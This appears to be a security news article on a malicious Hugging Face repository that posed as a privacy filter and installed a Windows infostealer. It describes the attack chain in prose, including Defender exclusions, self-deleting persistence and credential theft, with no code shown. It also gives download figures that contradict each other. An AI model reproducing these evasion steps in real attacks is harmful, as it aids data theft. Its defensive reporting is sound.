A widely used artificial intelligence repository on the Hugging Face platform has been discovered to contain malware, particularly targeting Windows operating systems. This repository, known as ‘Open-OSS/privacy-filter,’ was downloaded over 200,000 times before its removal by the platform’s security team.
Deceptive Appearance of the Malicious Package
The suspicious package was cleverly disguised as a legitimate privacy filtering tool, borrowing its model card directly from OpenAI’s Privacy Filter project. This misleading appearance led thousands of developers and researchers to download it, believing it to be a trustworthy AI utility.
Researchers from Hidden Layer were the first to identify the malicious code embedded within the repository. Their in-depth analysis uncovered a complex, multi-stage attack chain designed to covertly steal sensitive data from Windows devices while remaining undetected.
Stealthy Execution and Widespread Impact
The malware operated silently, executing in the background without alerting users. It employed a loader file that mimicked a legitimate AI model tool, commencing its harmful activities once activated on a Windows machine.
Before the repository was taken down, it had reached the top trending position on Hugging Face, with an estimated 244 downloads and 77 likes in under an hour. These figures were likely manipulated to boost the repository’s visibility and lure more victims.
Detailed Analysis of the Attack Chain
The attack unfolded over six stages. Initially, users were instructed to clone the repository and execute a ‘startbat’ file on Windows, or a ‘loaderpy’ script on Linux or macOS. On Windows, the ‘loaderpy’ script executed a decoy code, leading to a function that disabled SSL verification, decoded a URL, and fetched a JSON document to extract a command for PowerShell.
Subsequently, PowerShell downloaded a batch file from a domain imitating a blockchain analytics service. This file performed several actions, including admin checks and payload downloads. It also added exclusions to Microsoft Defender and created a scheduled task for persistence, which deleted itself after execution to avoid detection.
Final Payload and Security Recommendations
The final payload was a 10 MB Rust-based infostealer with capabilities to retrieve various types of sensitive information. It targeted browser cookies, saved passwords, SSH keys, VPN configurations, and more, sending the gathered data to a command-and-control server.
Hidden Layer’s telemetry linked the attacker to multiple similar repositories, indicating a broader supply chain attack on open-source AI platforms. Users who downloaded the affected repository are advised to isolate their systems, change stored credentials, and consider reimaging their machines before returning them to active use.
For comprehensive threat intelligence, review the Indicators of Compromise (IoCs) related to this incident. Follow security best practices to safeguard against future threats.
